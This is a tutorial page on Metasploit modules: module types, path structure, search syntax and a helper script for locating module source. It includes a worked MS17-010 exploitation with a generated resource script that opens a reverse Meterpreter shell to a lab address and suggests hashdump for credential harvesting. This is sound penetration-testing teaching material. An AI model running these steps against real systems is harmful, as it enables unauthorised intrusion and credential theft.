Noirchapeau's Gitbook

Working with Metasploit Modules

Overview of Metasploit Modules

Metasploit's modules are self-contained Ruby classes, each written for one task: scanning, exploitation, payload delivery, post-exploitation, or evasion. They are the unit of work in the framework; msfconsole loads one module at a time, and almost every other command (set, check, run, sessions) acts on the module currently loaded.

Purpose of Modules:

  • Automate repetitive processes such as version scanning and credential checks.

  • Enhance manual testing by providing reusable, tested functionality for a known vulnerability or protocol.

  • Organize tools and exploits into a consistent, searchable hierarchy.

Types of Metasploit Modules

  1. Auxiliary Modules:

    • Non-exploit modules for scanning, fuzzing, sniffing, brute forcing, and information gathering. They never deliver a payload, which is what makes them the right place to start.

    • Example:

      auxiliary/scanner/smb/smb_version
  2. Encoders:

    • Transform a payload so that it avoids bad characters (null bytes, newlines) the target input cannot carry. They were never a reliable antivirus bypass: common encoders such as shikata_ga_nai are themselves signatured, so expect them to add detections rather than remove them.

    • Example:

      encoder/x86/shikata_ga_nai (passed to msfvenom as -e x86/shikata_ga_nai)
  3. Exploits:

    • Trigger a specific vulnerability in a system or application in order to run a payload.

    • Example:

      exploit/windows/smb/ms17_010_eternalblue
  4. NOPs (No-Operation):

    • Generate NOP sleds that pad a payload to a fixed size and give an imprecise control-flow transfer a safe place to land.

    • Example:

      nop/x86/single_byte
  5. Payloads:

    • The code that runs on the target once an exploit succeeds, usually a command shell or Meterpreter. Staged payloads (a slash before the stager name, as below) download the rest of their code over the first connection; stageless payloads (windows/meterpreter_reverse_tcp, with an underscore) are self-contained and larger.

    • Example:

      windows/meterpreter/reverse_tcp
  6. Post-Exploitation Modules:

    • Run against an existing session after access is gained: credential dumping, enumeration, or lateral movement.

    • Example:

      post/windows/gather/hashdump
  7. Evasion Modules:

    • Build executables intended to slip past a specific endpoint defense; they are a separate type since msf5.

    • Example:

      evasion/windows/windows_defender_exe
  8. Plugins:

    • Ruby extensions loaded with the load command that add console features or integrations with external tools such as vulnerability scanners.

    • Example:

      openvas

Module Structure

Modules are organized hierarchically by type, target platform or category, service, and a descriptive name. In msfconsole the path reads:

General Format:

<type>/<os>/<service>/<module_name>

Example:

exploit/windows/http/iis_webdav_scstoragepathfromurl

Components Explained:

  1. Type: Module category (exploit, auxiliary, post, payload, encoder, nop, evasion). On disk the directory is the plural form (modules/exploits/...) while the console uses the singular.

  2. Operating System: Target platform for exploits, payloads, and post modules (windows, linux, multi). For auxiliary modules this slot is instead the module's category (scanner, admin, dos, fuzzers).

  3. Service: Vulnerable application or protocol (e.g., http, smb).

  4. Name: Descriptive identifier of the module, usually the product and the vulnerable function or the advisory number.
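
The console path above is also where the module's Ruby source lives, and reading that file is the fastest way to learn what a module really does before running it. The shell helper below is an added example, not part of the original page or of Metasploit itself; it assumes MSF_ROOT points at a framework checkout (the Kali package path is used when it is unset) and checks ~/.msf4/modules first, the directory where user-written modules are placed.

```shell
#!/bin/sh
# Added example: map an msfconsole module path to the .rb file it is loaded from.
# Assumptions: MSF_ROOT (or the Kali default /usr/share/metasploit-framework)
# is a framework install; ~/.msf4/modules holds user modules and wins if present.
set -e

# plural_type TYPE: console types are singular, the directories under modules/
# are plural for exploit, payload, encoder and nop; auxiliary, post and evasion
# are spelled the same in both places.
plural_type() {
  case "$1" in
    exploit|payload|encoder|nop) printf '%ss\n' "$1" ;;
    auxiliary|post|evasion)      printf '%s\n' "$1" ;;
    *) echo "unknown module type: $1" >&2; return 1 ;;
  esac
}

# module_relpath CONSOLE_PATH: path of the source file relative to a modules dir,
# e.g. exploit/windows/http/foo -> exploits/windows/http/foo.rb
module_relpath() {
  type="${1%%/*}"
  rest="${1#*/}"
  [ "$type" != "$1" ] || { echo "not a module path: $1" >&2; return 1; }
  dir=$(plural_type "$type") || return 1
  printf '%s/%s.rb\n' "$dir" "$rest"
}

# module_file CONSOLE_PATH: first existing source file, user modules first.
module_file() {
  rel=$(module_relpath "$1") || return 1
  for base in "${HOME}/.msf4/modules" "${MSF_ROOT:-/usr/share/metasploit-framework}/modules"; do
    if [ -f "$base/$rel" ]; then
      printf '%s\n' "$base/$rel"
      return 0
    fi
  done
  echo "source not found for $1 (looked for $rel)" >&2
  return 1
}

# Usage: module_file exploit/windows/http/iis_webdav_scstoragepathfromurl
```

The same mapping explains why a custom module must be dropped into ~/.msf4/modules/exploits/... (plural) even though it is later loaded with use exploit/... (singular).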

Searching for Modules

Use the search command to locate modules by free-text keyword or by field. Fields include name, type, platform, cve, rank, author, and date; prefixing a value with - excludes matches for that field.

Syntax:

search [<options>] [<keywords>:<value>]

Examples:

  • Search for modules related to MS17-010:

    search ms17_010
  • Filter by CVE year and module type:

    search cve:2009 type:exploit
  • Exclude specific platforms (e.g., Linux):

    search platform:-linux

Search Options:

  -h           Displays help for the search command, including the full list of fields.
  -o <file>    Saves search results to a file in CSV format.
  -S <regex>   Applies a regex filter to the result rows.
  -s <column>  Sorts results by a column (for example rank or date).
  -r           Reverses the sort order (descending).
  -u           Loads the module directly when the search returns exactly one result.

Using Modules: Practical Example

Scenario: Exploiting MS17-010 with exploit/windows/smb/ms17_010_psexec, the module that implements the EternalRomance/EternalSynergy/EternalChampion technique. It is generally more reliable than ms17_010_eternalblue and less likely to crash the target, but it needs a named pipe the unauthenticated client can reach, so confirm the host is vulnerable first (auxiliary/scanner/smb/smb_ms17_010 reports both the vulnerability and the reachable pipes).

  1. Search for the Exploit:

    msf6 > search ms17_010
  2. Select the Module:

    msf6 > use exploit/windows/smb/ms17_010_psexec
  3. View Module Information:

    msf6 exploit(windows/smb/ms17_010_psexec) > info
  4. Configure Options:

    msf6 exploit(windows/smb/ms17_010_psexec) > options
    msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS <target_IP>
    msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST <attacker_IP>

    LHOST belongs to the reverse Meterpreter payload selected by default and must be an address the target can actually route back to; change the payload with set payload if a different one is needed.
  5. Execute the Exploit:

    msf6 exploit(windows/smb/ms17_010_psexec) > run
  6. Post-Exploitation:

    • A successful run opens a Meterpreter session. Use its built-in commands, or post modules such as post/windows/gather/hashdump, for privilege escalation, credential harvesting, or pivoting.
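
The six steps above can be scripted as an msfconsole resource file, which is how the same workflow is repeated across a lab or a list of hosts. The script below is an added example, not code from the original page or from Metasploit; it assumes the addresses 10.10.10.40 and 10.10.14.5 are placeholder lab hosts, that /tmp is writable, and it runs the vulnerability scanner before the exploit so a non-vulnerable host never receives the exploit traffic. msfconsole is only launched when MSF_RUN=1 is set, so the generator itself works offline.

```shell
#!/bin/sh
# Added example: the MS17-010 procedure from the page as a resource script.
# Assumptions: 10.10.10.40 / 10.10.14.5 are placeholder lab addresses,
# /tmp is writable, and the payload and LPORT are the usual defaults.
set -e

# build_rc TARGET LHOST OUTFILE
# Writes a resource script that (1) confirms the host is vulnerable and shows
# which named pipes are reachable, then (2) loads ms17_010_psexec, sets the
# options and runs it as a background job (-j) so the session outlives the script.
build_rc() {
  target="$1"; lhost="$2"; out="$3"
  cat > "$out" <<EOF
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS ${target}
run
use exploit/windows/smb/ms17_010_psexec
set RHOSTS ${target}
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ${lhost}
set LPORT 4444
exploit -j
EOF
  printf '%s\n' "$out"
}

# rc_module_count FILE: number of modules the script loads (one per "use" line).
rc_module_count() {
  grep -c '^use ' "$1"
}

# run_rc FILE: launch msfconsole on the script if it is installed; otherwise
# leave the file in place so it can be run later with: msfconsole -q -r FILE
run_rc() {
  if command -v msfconsole >/dev/null 2>&1; then
    msfconsole -q -r "$1"
  else
    echo "msfconsole not on PATH; resource script left at $1" >&2
  fi
}

rc_file=$(build_rc 10.10.10.40 10.10.14.5 /tmp/ms17_010.rc)
echo "resource script: $rc_file ($(rc_module_count "$rc_file") modules)"
# Opt in to actually launching the console; generating the file is harmless.
if [ "${MSF_RUN:-0}" = 1 ]; then
  run_rc "$rc_file"
fi
```

Because the exploit is started with exploit -j, the console stays open after the script finishes and the resulting session is picked up with sessions -l and sessions -i <id>; a scanner verdict of "does NOT appear vulnerable" is the cue to stop before the second module runs.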


Command Cheatsheet

  search <keyword>      Locate modules matching the keyword.
  use <module_path>     Load a module into the console.
  info                  Display detailed information about the loaded module.
  show options          List configurable parameters for the module.
  show advanced         List advanced parameters, including evasion-related ones.
  set <option> <value>  Configure an option for the loaded module (setg sets it for all modules).
  check                 Test whether the target is vulnerable without exploiting it, where the module implements a check.
  run or exploit        Execute the module (-j runs it as a background job).
  show payloads         View payloads compatible with the module.
  show targets          List targets supported by the module.
  sessions -l           List open sessions; sessions -i <id> interacts with one.
  back                  Unload the current module.
